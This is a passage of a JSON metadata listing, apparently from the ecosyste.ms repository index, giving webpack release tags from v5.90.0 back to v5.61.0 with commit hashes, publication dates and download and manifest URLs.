cosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp